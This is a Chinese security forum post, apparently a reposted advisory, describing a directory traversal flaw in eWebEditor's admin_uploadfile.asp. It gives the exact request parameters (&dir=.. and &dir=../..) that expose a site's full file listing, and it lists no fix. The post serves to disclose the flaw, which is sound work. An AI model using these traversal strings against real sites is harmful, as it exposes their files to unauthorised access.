找回密码
 开放注册

QQ登录

只需一步,快速开始

微信登录

微信扫码,快速开始

搜索
NB5牛论坛»首页 技术交流区 网安技术 ewebeditor遍历路径漏洞
返回列表 发新帖
查看: 1210|回复: 0

ewebeditor遍历路径漏洞

[复制链接]
lukeji3

586

主题

167

回帖

1015

牛毛

二级牛人

本無情,何必去愛

积分
1015
QQ
发表于 2008-1-14 12:45:53 | 显示全部楼层 |阅读模式 来自 浙江省杭州市
ewebeditor遍历路径漏洞
受影响版本:
eWebEditor
描述:
eWebEditor是一个所见即所得的在线编辑器。顾名思义,就是能在网络上使用所见即所得的编辑方式进行编辑图文并茂的文章、新闻、讨论贴、通告、记事等多种文字处理应用。
ewebeditor/admin_uploadfile.asp
过滤不严,造成遍历路径漏洞

测试方法:

[警 告]

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用.风险自负!

ewebeditor/admin_uploadfile.asp?id=14
在id=14后面添加&dir=..
再加 &dir=../..
&dir=http://www.****.com/../.. 看到整个网站文件了
建议:
暂无
http://www.ewebeditor.net/
遍历, 漏洞, 路径
回复

举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 开放注册

本版积分规则

帮助|Archiver|小黑屋|通信管理局专项备案号:[2008]238号|NB5社区 ( 皖ICP备08004151号;皖公网安备34010402700514号 )

GMT+8, 2025-4-26 17:38 , Processed in 0.195748 second(s), 35 queries .

Powered by Discuz! X3.5

快速回复 返回顶部 返回列表